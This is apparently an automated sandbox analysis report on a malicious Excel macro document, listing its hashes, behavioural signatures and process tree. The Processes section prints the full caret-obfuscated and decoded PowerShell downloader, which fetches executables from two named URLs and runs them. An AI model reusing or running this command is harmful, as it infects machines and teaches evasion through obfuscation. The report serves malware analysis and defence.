Analysis
-
max time kernel
24s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
22-07-2024 22:25
Behavioral task
behavioral1
Sample
99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
Resource
win10v2004-20240709-en
General
-
Target
99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
-
Size
52KB
-
MD5
86f2a9879de336b1c983755b2615f926
-
SHA1
19250c71f3eb28a6b4e3febef6dfa47a30e3342e
-
SHA256
99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4
-
SHA512
d37da87e8a2e65b17f138540283e005b68016c7a2688889f621858b06cf1362cab8d21a91a4e99c47b87ec996e31c1813a389f45418eee45f91620800e987bcc
-
SSDEEP
1536:0fxEtjPOtioVjDGUU1qfDlaGGx+cMdg6boobYGF7:0fxEtjPOtioVjDGUU1qfDlaGGx+cMdgw
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 3852 2216 CMd.exe 29 -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 3876 powershell.exe -
pid Process 3876 powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2216 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3876 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3876 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2216 EXCEL.EXE 2216 EXCEL.EXE 2216 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2216 wrote to memory of 3852 2216 EXCEL.EXE 30 PID 2216 wrote to memory of 3852 2216 EXCEL.EXE 30 PID 2216 wrote to memory of 3852 2216 EXCEL.EXE 30 PID 2216 wrote to memory of 3852 2216 EXCEL.EXE 30 PID 3852 wrote to memory of 3876 3852 CMd.exe 32 PID 3852 wrote to memory of 3876 3852 CMd.exe 32 PID 3852 wrote to memory of 3876 3852 CMd.exe 32 PID 3852 wrote to memory of 3876 3852 CMd.exe 32
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\CMd.exeCMd.exe /c "p^ow^Ers^hel^l^.e^xe^ -nO^l -No^Ni^Nt^ -W^IndOws^ 1 -NoprOFIle^ -ex^Ec^u B^Ypa^S^s -Wi^ 1 -N^O^Pr^ $random = N^ew-^O^b^je^ct^ Sy^st^em.^Ran^do^m; Fo^rea^ch($um in @({http://cizijazykyhrou.cz/ama.exe},{http://biwebdisseny.com/eco.exe})) { t^ry { $fg = $ra^n^do^m.n^e^xt(0, 61132); $pp = '%appdata%\' + $fg + '.exe'; ^(^ne^w-^ob^jec^t s^ys^t^e^m.ne^t^.webcli^en^t)^.D^ow^nl^o^ad^Fi^le($um.ToString(), $pp); St^a^rt-^Pr^oce^ss $pp; b^re^ak; } c^at^ch { Wr^it^e-Ho^st $err^or[0].E^x^cep^ti^on } }"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowErshell.exe -nOl -NoNiNt -WIndOws 1 -NoprOFIle -exEcu BYpaSs -Wi 1 -NOPr $random = New-Object System.Random; Foreach($um in @({http://cizijazykyhrou.cz/ama.exe},{http://biwebdisseny.com/eco.exe})) { try { $fg = $random.next(0, 61132); $pp = 'C:\Users\Admin\AppData\Roaming\' + $fg + '.exe'; (new-object system.net.webclient).DownloadFile($um.ToString(), $pp); Start-Process $pp; break; } catch { Write-Host $error[0].Exception } }3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-